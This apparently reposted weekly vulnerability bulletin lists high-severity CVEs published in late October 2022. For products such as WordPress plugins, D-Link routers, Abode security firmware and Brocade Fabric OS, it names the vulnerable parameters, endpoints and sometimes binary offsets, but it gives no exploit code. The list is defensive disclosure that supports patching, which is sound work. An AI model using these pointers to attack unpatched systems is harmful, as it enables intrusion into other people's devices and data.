Month: October 2022

alerts

Vulnerability Summary for the Week of October 24, 2022

Post author By admin
Post date October 31, 2022

Original release date: October 31, 2022

High Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
10web — form_maker	The Form Maker by 10Web WordPress plugin before 1.15.6 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin	2022-10-25	7.2	CVE-2022-3300 CONFIRM
adenion — blog2social	The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.9.10 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers	2022-10-25	8.8	CVE-2022-3246 CONFIRM
adobe — illustrator	Adobe Illustrator versions 26.4 (and earlier) and 25.4.7 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-25	7.8	CVE-2022-38435 MISC
adobe– illustrator	Adobe Illustrator versions 26.4 (and earlier) and 25.4.7 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-25	7.8	CVE-2022-38436 MISC
advantech — r-seenet	Advantech R-SeeNet Versions 2.4.17 and prior are vulnerable to a stack-based buffer overflow. An unauthorized attacker can remotely overflow the stack buffer and enable remote code execution.	2022-10-27	9.8	CVE-2022-3385 MISC
advantech — r-seenet	Advantech R-SeeNet Versions 2.4.17 and prior are vulnerable to a stack-based buffer overflow. An unauthorized attacker can use an outsized filename to overflow the stack buffer and enable remote code execution.	2022-10-27	9.8	CVE-2022-3386 MISC
apache — batik	A vulnerability in Batik of Apache XML Graphics allows an attacker to run untrusted Java code from an SVG. This issue affects Apache XML Graphics prior to 1.16. It is recommended to update to version 1.16.	2022-10-25	7.5	CVE-2022-41704 MISC MLIST MLIST DEBIAN
apache — batik	A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16.	2022-10-25	7.5	CVE-2022-42890 MISC MLIST MLIST DEBIAN
apache — flume	Apache Flume versions 1.4.0 through 1.10.1 are vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with an unsafe providerURL. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol.	2022-10-26	9.8	CVE-2022-42468 CONFIRM CONFIRM CONFIRM
apache — heron	Heron versions <= 0.20.4-incubating allows CRLF log injection because of the lack of escaping in the log statements. Please update to version 0.20.5-incubating which addresses this issue.	2022-10-24	9.8	CVE-2021-42010 MISC MLIST
apache — iotdb	Apache IoTDB version 0.12.2 to 0.12.6, 0.13.0 to 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. Users should upgrade to 0.13.3 which addresses this issue or use a later version of Java to avoid it.	2022-10-26	7.5	CVE-2022-43766 CONFIRM
apache — linkis	In Apache Linkis <=1.2.0 when used with the MySQL Connector/J, a deserialization vulnerability with possible remote code execution impact exists when an attacker has write access to a database and configures a JDBC EC with a MySQL data source and malicious parameters. Therefore, the parameters in the jdbc url should be blacklisted. Versions of Apache Linkis <= 1.2.0 will be affected, We recommend users to update to 1.3.0.	2022-10-26	8.8	CVE-2022-39944 CONFIRM
arm — midguard_gpu_kernel_driver	An Arm product family through 2022-08-12 mail GPU kernel driver allows non-privileged users to make improper GPU processing operations to gain access to already freed memory.	2022-10-25	8.8	CVE-2022-38181 MISC MISC
autodesk — autocad_plant_3d	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-41309 MISC
autodesk — autocad_plant_3d	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-41310 MISC
autodesk — autocad_plant_3d	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42933 MISC
autodesk — autocad_plant_3d	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42934 MISC
autodesk — autocad_plant_3d	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42935 MISC
autodesk — autocad_plant_3d	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42936 MISC
autodesk — autocad_plant_3d	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42937 MISC
autodesk — autocad_plant_3d	A malicious crafted TGA file when consumed through DesignReview.exe application could lead to memory corruption vulnerability. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42938 MISC
autodesk — autocad_plant_3d	A malicious crafted TGA file when consumed through DesignReview.exe application could lead to memory corruption vulnerability. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42939 MISC
autodesk — autocad_plant_3d	A malicious crafted TGA file when consumed through DesignReview.exe application could lead to memory corruption vulnerability. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42940 MISC
autodesk — autocad_plant_3d	A malicious crafted dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42941 MISC
autodesk — autocad_plant_3d	A malicious crafted dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42942 MISC
autodesk — autocad_plant_3d	A malicious crafted dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42943 MISC
autodesk — autocad_plant_3d	A malicious crafted dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42944 MISC
automox — automox	The Automox Agent before 40 on Windows incorrectly sets permissions on key files.	2022-10-21	7.8	CVE-2022-36122 MISC MISC
axiosys — bento4	A vulnerability was found in Axiomatic Bento4. It has been declared as critical. This vulnerability affects the function GetOffset of the file Ap4Sample.h of the component mp42hls. The manipulation leads to use after free. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-212002 is the identifier assigned to this vulnerability.	2022-10-26	7.8	CVE-2022-3662 MISC MISC MISC
axiosys — bento4	A vulnerability classified as critical has been found in Axiomatic Bento4. Affected is the function AP4_BitStream::WriteBytes of the file Ap4BitStream.cpp of the component avcinfo. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212004.	2022-10-26	7.8	CVE-2022-3664 MISC MISC MISC
axiosys — bento4	A vulnerability classified as critical was found in Axiomatic Bento4. Affected by this vulnerability is an unknown functionality of the file AvcInfo.cpp of the component avcinfo. The manipulation leads to heap-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212005 was assigned to this vulnerability.	2022-10-26	7.8	CVE-2022-3665 MISC MISC MISC
axiosys — bento4	A vulnerability, which was classified as critical, has been found in Axiomatic Bento4. Affected by this issue is the function AP4_LinearReader::Advance of the file Ap4LinearReader.cpp of the component mp42ts. The manipulation leads to use after free. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-212006 is the identifier assigned to this vulnerability.	2022-10-26	7.8	CVE-2022-3666 MISC MISC MISC
axiosys — bento4	A vulnerability was found in Axiomatic Bento4. It has been classified as critical. Affected is the function WriteSample of the component mp42hevc. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-212010 is the identifier assigned to this vulnerability.	2022-10-26	7.8	CVE-2022-3670 MISC MISC MISC
axiosys — bento4	A vulnerability, which was classified as critical, was found in Axiomatic Bento4. This affects the function AP4_MemoryByteStream::WritePartial of the file Ap4ByteStream.cpp of the component mp42aac. The manipulation leads to heap-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212007.	2022-10-26	7.5	CVE-2022-3667 MISC MISC MISC
baramundi — management_suite	baramundi Management Agent (bMA) in baramundi Management Suite (bMS) 2021 R1 and R2 and 2022 R1 allows remote code execution. This is fixed in 2022 R2.	2022-10-26	9.8	CVE-2022-43747 MISC
barangay_management_system_project — barangay_management_system	Barangay Management System v1.0 was discovered to contain a SQL injection vulnerability via the hidden_id parameter at /clearance/clearance.php.	2022-10-28	7.2	CVE-2022-43228 MISC
bestwebsoft — post_to_csv	The Post to CSV by BestWebSoft WordPress plugin through 1.4.0 does not properly escape fields when exporting data as CSV, leading to a CSV injection	2022-10-25	9.8	CVE-2022-3393 CONFIRM
broadcom — fabric_operating_system	Brocade Webtools in Brocade Fabric OS versions before Brocade Fabric OS versions v9.1.1, v9.0.1e, and v8.2.3c could allow a low privilege webtools, user, to gain elevated admin rights, or privileges, beyond what is intended or entitled for that user. By exploiting this vulnerability, a user whose role is not an admin can create a new user with an admin role using the operator session id. The issue was replicated after intercepting the admin, and operator authorization headers sent unencrypted and editing a user addition request to use the operator’s authorization header.	2022-10-25	8.8	CVE-2022-28169 MISC
broadcom — fabric_operating_system	A vulnerability in Brocade Fabric OS CLI before Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, and 7.4.2j could allow a local authenticated user to break out of restricted shells with “set context” and escalate privileges.	2022-10-25	8.8	CVE-2022-33179 MISC
broadcom — fabric_operating_system	A vulnerability in Brocade Fabric OS CLI before Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, 8.2.0cbn5, 7.4.2.j could allow a remote authenticated attacker to perform stack buffer overflow using in “firmwaredownload” and “diagshow” commands.	2022-10-25	8.8	CVE-2022-33183 MISC
broadcom — fabric_operating_system	A privilege escalation vulnerability in Brocade Fabric OS CLI before Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, 8.2.0cbn5, could allow a local authenticated user to escalate its privilege to root using switch commands “supportlink”, “firmwaredownload”, “portcfgupload, license, and “fosexec”.	2022-10-25	7.8	CVE-2022-33182 MISC
broadcom — fabric_operating_system	A vulnerability in fab_seg.c.h libraries of all Brocade Fabric OS versions before Brocade Fabric OS v9.1.1, v9.0.1e, v8.2.3c, v8.2.0_cbn5, 7.4.2j could allow local authenticated attackers to exploit stack-based buffer overflows and execute arbitrary code as the root user account.	2022-10-25	7.8	CVE-2022-33184 MISC
broadcom — fabric_operating_system	Several commands in Brocade Fabric OS before Brocade Fabric OS v.9.0.1e, and v9.1.0 use unsafe string functions to process user input. Authenticated local attackers could abuse these vulnerabilities to exploit stack-based buffer overflows, allowing arbitrary code execution as the root user account.	2022-10-25	7.8	CVE-2022-33185 MISC
broadcom — fabric_operating_system	A vulnerability in the radius authentication system of Brocade Fabric OS before Brocade Fabric OS 9.0 could allow a remote attacker to execute arbitrary code on the Brocade switch.	2022-10-25	7.2	CVE-2022-33178 MISC
canteen_management_system_project — canteen_management_system	Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via /youthappam/manage_website.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-28	7.2	CVE-2022-43231 MISC
canteen_management_system_project — canteen_management_system	Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchOrderData.php.	2022-10-28	7.2	CVE-2022-43232 MISC
canteen_management_system_project — canteen_management_system	Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchSelectedUser.php.	2022-10-28	7.2	CVE-2022-43233 MISC
canteen_management_system_project — canteen_management_system	Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via /youthappam/php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-28	7.2	CVE-2022-43275 MISC
canteen_management_system_project — canteen_management_system	Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the productId parameter at /php_action/fetchSelectedfood.php.	2022-10-28	7.2	CVE-2022-43276 MISC
cert — vince	A Remote Code Injection vulnerability exists in CERT software prior to version 1.50.5. An authenticated attacker can inject arbitrary pickle object as part of a user’s profile. This can lead to code execution on the server when the user’s profile is accessed.	2022-10-26	8.8	CVE-2022-40238 MISC
cleantalk — spam_protection,_antispam,_firewall	The Spam protection, AntiSpam, FireWall by CleanTalk WordPress plugin before 5.185.1 does not validate ids before using them in a SQL statement, which could lead to SQL injection exploitable by high privilege users such as admin	2022-10-25	7.2	CVE-2022-3302 CONFIRM
dataease — dataease	Dataease is an open source data visualization analysis tool. Dataease prior to 1.15.2 has a deserialization vulnerability. In Dataease, the Mysql data source in the data source function can customize the JDBC connection parameters and the Mysql server target to be connected. In `backend/src/main/java/io/dataease/provider/datasource/JdbcProvider.java`, the `MysqlConfiguration` class does not filter any parameters. If an attacker adds some parameters to a JDBC url and connects to a malicious mysql server, the attacker can trigger the mysql jdbc deserialization vulnerability. Through the deserialization vulnerability, the attacker can execute system commands and obtain server privileges. Version 1.15.2 contains a patch for this issue.	2022-10-25	9.8	CVE-2022-39312 MISC MISC MISC CONFIRM
dell — emc_powerscale_onefs	Dell PowerScale OneFS, versions 8.2.0.x-9.4.0.x contain allocation of Resources Without Limits or Throttling vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service and performance issue on that node.	2022-10-21	7.5	CVE-2022-34439 CONFIRM
dell — powerstoreos	Dell PowerStore versions 2.1.0.x contain an Authentication bypass vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability under specific configuration. An attacker would gain unauthorized access upon successful exploit.	2022-10-21	9.8	CVE-2022-26870 CONFIRM
deltaww — diaenergie	The HandlerPageP_KID class in Delta Electronics DIAEnergy v1.9 contains a SQL Injection flaw that could allow an attacker to gain code execution on a remote system.	2022-10-26	9.8	CVE-2022-43774 MISC
deltaww — diaenergie	The HICT_Loop class in Delta Electronics DIAEnergy v1.9 contains a SQL Injection flaw that could allow an attacker to gain code execution on a remote system.	2022-10-26	9.8	CVE-2022-43775 MISC
deltaww — diaenergie	The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a SQL injection that exists in CheckIoTHubNameExisted. A low-privileged authenticated attacker could exploit this issue to inject arbitrary SQL queries.	2022-10-27	8.8	CVE-2022-40967 MISC
deltaww — diaenergie	The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a SQL injection that exists in GetDIAE_line_message_settingsListParameters. A low-privileged authenticated attacker could exploit this issue to inject arbitrary SQL queries.	2022-10-27	8.8	CVE-2022-41133 MISC
deltaww — diaenergie	The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a SQL injection that exists in CheckDIACloud. A low-privileged authenticated attacker could exploit this issue to inject arbitrary SQL queries.	2022-10-27	8.8	CVE-2022-41773 MISC
discourse — patreon	Discourse Patreon enables syncronization between Discourse Groups and Patreon rewards. On sites with Patreon login enabled, an improper authentication vulnerability could be used to take control of a victim’s forum account. This vulnerability is patched in commit number 846d012151514b35ce42a1636c7d70f6dcee879e of the discourse-patreon plugin. Out of an abundance of caution, any Discourse accounts which have logged in with an unverified-email Patreon account will be logged out and asked to verify their email address on their next login. As a workaround, disable the patreon integration and log out all users with associated Patreon accounts.	2022-10-26	9.8	CVE-2022-39355 MISC CONFIRM
dlink — dir-816_firmware	D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the srcip parameter at /goform/form2IPQoSTcAdd.	2022-10-26	9.8	CVE-2022-42998 MISC MISC
dlink — dir-816_firmware	D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the wizardstep4_pskpwd parameter at /goform/form2WizardStep4.	2022-10-26	9.8	CVE-2022-43000 MISC MISC
dlink — dir-816_firmware	D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the pskValue parameter in the setSecurity function.	2022-10-26	9.8	CVE-2022-43001 MISC MISC
dlink — dir-816_firmware	D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the wizardstep54_pskpwd parameter at /goform/form2WizardStep54.	2022-10-26	9.8	CVE-2022-43002 MISC MISC
dlink — dir-816_firmware	D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the pskValue parameter in the setRepeaterSecurity function.	2022-10-26	9.8	CVE-2022-43003 MISC MISC
dlink — dir-816_firmware	D-Link DIR-816 A2 1.10 B05 was discovered to contain multiple command injection vulnerabilities via the admuser and admpass parameters at /goform/setSysAdm.	2022-10-26	7.5	CVE-2022-42999 MISC MISC
elearning_system_project — elearning_system	A vulnerability classified as critical was found in SourceCodester eLearning System 1.0. This vulnerability affects unknown code of the file /admin/students/manage.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-212014 is the identifier assigned to this vulnerability.	2022-10-26	9.8	CVE-2022-3671 N/A N/A
employee_record_management_system_project — employee_record_management_system	Employee Record Management System v 1.2 is vulnerable to SQL Injection via editempprofile.php.	2022-10-28	9.8	CVE-2021-37782 MISC MISC
evm_project — evm	SputnikVM, also called evm, is a Rust implementation of Ethereum Virtual Machine. A custom stateful precompile can use the `is_static` parameter to determine if the call is executed in a static context (via `STATICCALL`), and thus decide if stateful operations should be done. Prior to version 0.36.0, the passed `is_static` parameter was incorrect — it was only set to `true` if the call came from a direct `STATICCALL` opcode. However, once a static call context is entered, it should stay static. The issue only impacts custom precompiles that actually uses `is_static`. For those affected, the issue can lead to possible incorrect state transitions. Version 0.36.0 contains a patch. There are no known workarounds.	2022-10-25	7.5	CVE-2022-39354 MISC CONFIRM
exiv2 — exiv2	A vulnerability, which was classified as critical, has been found in Exiv2. Affected by this issue is the function BmffImage::boxHandler of the file bmffimage.cpp. The manipulation leads to memory corruption. The attack may be launched remotely. The name of the patch is a58e52ed702d3bc7b8bab7ec1d70a4849eebece3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-212348.	2022-10-27	9.8	CVE-2022-3717 MISC MISC
exiv2 — exiv2	A vulnerability has been found in Exiv2 and classified as critical. This vulnerability affects the function QuickTimeVideo::userDataDecoder of the file quicktimevideo.cpp of the component QuickTime Video Handler. The manipulation leads to heap-based buffer overflow. The attack can be initiated remotely. The name of the patch is a38e124076138e529774d5ec9890d0731058115a. It is recommended to apply a patch to fix this issue. VDB-212350 is the identifier assigned to this vulnerability.	2022-10-27	9.8	CVE-2022-3719 MISC MISC MISC
extended_keccak_code_package_project — extended_keccak_code_package	The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface.	2022-10-21	9.8	CVE-2022-37454 MISC MISC MISC MISC
f5 — nginx	A vulnerability was found in Nginx and classified as problematic. This issue affects some unknown processing of the file ngx_resolver.c of the component IPv4 Off Handler. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211937 was assigned to this vulnerability.	2022-10-21	7.5	CVE-2022-3638 N/A N/A N/A
featherjs — feathers-sequelize	Due to improper input validation in the Feathers js library, it is possible to perform a SQL injection attack on the back-end database, in case the feathers-sequelize package is used.	2022-10-26	9.8	CVE-2022-2422 CONFIRM CONFIRM
featherjs — feathers-sequelize	Due to improper parameter filtering in the Feathers js library, which may ultimately lead to SQL injection	2022-10-26	9.8	CVE-2022-29822 CONFIRM CONFIRM
featherjs — feathers-sequelize	Feather-Sequalize cleanQuery method uses insecure recursive logic to filter unsupported keys from the query object. This results in a Remote Code Execution (RCE) with privileges of application.	2022-10-26	9.8	CVE-2022-29823 CONFIRM CONFIRM
free5gc — free5gc	Free5gc v3.2.1 is vulnerable to Information disclosure.	2022-10-25	7.5	CVE-2022-38870 MISC
gin-vue-admin_project — gin-vue-admin	Gin-vue-admin is a backstage management system based on vue and gin, which separates the front and rear of the full stack. Versions prior to 2.5.4 contain a file upload ability. The affected code fails to validate fileMd5 and fileName parameters, resulting in an arbitrary file being read. This issue is patched in 2.5.4b. There are no known workarounds.	2022-10-24	9.8	CVE-2022-39305 MISC CONFIRM
gin-vue-admin_project — gin-vue-admin	Gin-vue-admin is a backstage management system based on vue and gin, which separates the front and rear of the full stack. Gin-vue-admin prior to 2.5.4 is vulnerable to path traversal, which leads to file upload vulnerabilities. Version 2.5.4 contains a patch for this issue. There are no workarounds aside from upgrading to a patched version.	2022-10-25	7.5	CVE-2022-39345 CONFIRM MISC MISC MISC
github — runner	GitHub Actions Runner is the application that runs a job from a GitHub Actions workflow. The actions runner invokes the docker cli directly in order to run job containers, service containers, or container actions. A bug in the logic for how the environment is encoded into these docker commands was discovered in versions prior to 2.296.2, 2.293.1, 2.289.4, 2.285.2, and 2.283.4 that allows an input to escape the environment variable and modify that docker command invocation directly. Jobs that use container actions, job containers, or service containers alongside untrusted user inputs in environment variables may be vulnerable. The Actions Runner has been patched, both on `github.com` and hotfixes for GHES and GHAE customers in versions 2.296.2, 2.293.1, 2.289.4, 2.285.2, and 2.283.4. GHES and GHAE customers may want to patch their instance in order to have their runners automatically upgrade to these new runner versions. As a workaround, users may consider removing any container actions, job containers, or service containers from their jobs until they are able to upgrade their runner versions.	2022-10-25	9.9	CVE-2022-39321 MISC MISC CONFIRM
gnu — libtasn1	GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.	2022-10-24	9.1	CVE-2021-46848 MISC MISC MISC
goabode — iota_all-in-one_security_kit_firmware	Four OS command injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A XCMD can lead to arbitrary command execution. An attacker can send a sequence of malicious commands to trigger these vulnerabilities.This vulnerability specifically focuses on the unsafe use of the `WL_SSID` and `WL_SSID_HEX` configuration values in the function at offset `0x1c7d28` of firmware 6.9Z.	2022-10-25	10	CVE-2022-33192 MISC
goabode — iota_all-in-one_security_kit_firmware	Four OS command injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A XCMD can lead to arbitrary command execution. An attacker can send a sequence of malicious commands to trigger these vulnerabilities.This vulnerability specifically focuses on the unsafe use of the `WL_WPAPSK` configuration value in the function located at offset `0x1c7d28` of firmware 6.9Z.	2022-10-25	10	CVE-2022-33193 MISC
goabode — iota_all-in-one_security_kit_firmware	Four OS command injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A XCMD can lead to arbitrary command execution. An attacker can send a sequence of malicious commands to trigger these vulnerabilities.This vulnerability focuses on the unsafe use of the `WL_Key` and `WL_DefaultKeyID` configuration values in the function located at offset `0x1c7d28` of firmware 6.9Z , and even more specifically on the command execution occuring at offset `0x1c7f6c`.	2022-10-25	10	CVE-2022-33194 MISC
goabode — iota_all-in-one_security_kit_firmware	Four OS command injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A XCMD can lead to arbitrary command execution. An attacker can send a sequence of malicious commands to trigger these vulnerabilities.This vulnerability focuses on the unsafe use of the `WL_DefaultKeyID` in the function located at offset `0x1c7d28` of firmware 6.9Z, and even more specifically on the command execution occuring at offset `0x1c7fac`.	2022-10-25	10	CVE-2022-33195 MISC
goabode — iota_all-in-one_security_kit_firmware	Four OS command injection vulnerabilities exists in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability focuses on the unsafe use of the `ssid_hex` HTTP parameter to construct an OS Command at offset `0x19afc0` of the `/root/hpgw` binary included in firmware 6.9Z.	2022-10-25	9.9	CVE-2022-33204 MISC
goabode — iota_all-in-one_security_kit_firmware	Four OS command injection vulnerabilities exists in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability focuses on the unsafe use of the `wpapsk_hex` HTTP parameter to construct an OS Command at offset `0x19b0ac` of the `/root/hpgw` binary included in firmware 6.9Z.	2022-10-25	9.9	CVE-2022-33205 MISC
goabode — iota_all-in-one_security_kit_firmware	Four OS command injection vulnerabilities exists in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability focuses on the unsafe use of the `key` and `default_key_id` HTTP parameters to construct an OS Command crafted at offset `0x19b1f4` of the `/root/hpgw` binary included in firmware 6.9Z.	2022-10-25	9.9	CVE-2022-33206 MISC
goabode — iota_all-in-one_security_kit_firmware	Four OS command injection vulnerabilities exists in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability focuses on a second unsafe use of the `default_key_id` HTTP parameter to construct an OS Command at offset `0x19B234` of the `/root/hpgw` binary included in firmware 6.9Z.	2022-10-25	9.9	CVE-2022-33207 MISC
goabode — iota_all-in-one_security_kit_firmware	An os command injection vulnerability exists in the web interface util_set_abode_code functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-27804 MISC
goabode — iota_all-in-one_security_kit_firmware	An authentication bypass vulnerability exists in the GHOME control functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted network request can lead to arbitrary XCMD execution. An attacker can send a malicious XML payload to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-27805 MISC
goabode — iota_all-in-one_security_kit_firmware	An OS command injection vulnerability exists in the web interface util_set_serial_mac functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-29472 MISC
goabode — iota_all-in-one_security_kit_firmware	An authentication bypass vulnerability exists in the web interface /action/factory* functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP header can lead to authentication bypass. An attacker can send an HTTP request to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-29477 MISC
goabode — iota_all-in-one_security_kit_firmware	An OS command injection vulnerability exists in the console_main_loop :sys functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z. A specially-crafted XCMD can lead to arbitrary command execution. An attacker can send an XML payload to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-29520 MISC
goabode — iota_all-in-one_security_kit_firmware	A hard-coded password vulnerability exists in the telnet functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z. Use of a hard-coded root password can lead to arbitrary command execution. An attacker can authenticate with hard-coded credentials to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-29889 MISC
goabode — iota_all-in-one_security_kit_firmware	An OS command injection vulnerability exists in the XCMD setUPnP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to arbitrary command execution. An attacker can send a malicious XML payload to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-30541 MISC
goabode — iota_all-in-one_security_kit_firmware	A stack-based buffer overflow vulnerability exists in the XCMD setIPCam functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to remote code execution. An attacker can send a malicious XML payload to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-32454 MISC
goabode — iota_all-in-one_security_kit_firmware	An OS command injection vulnerability exists in the XCMD doDebug functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to arbitrary command execution. An attacker can send a malicious XML payload to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-32773 MISC
goabode — iota_all-in-one_security_kit_firmware	An OS command injection vulnerability exists in the XCMD setAlexa functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z. A specially-crafted XCMD can lead to arbitrary command execution. An attacker can send a malicious XML payload to trigger this vulnerability.	2022-10-25	9.8	CVE-2022-33189 MISC
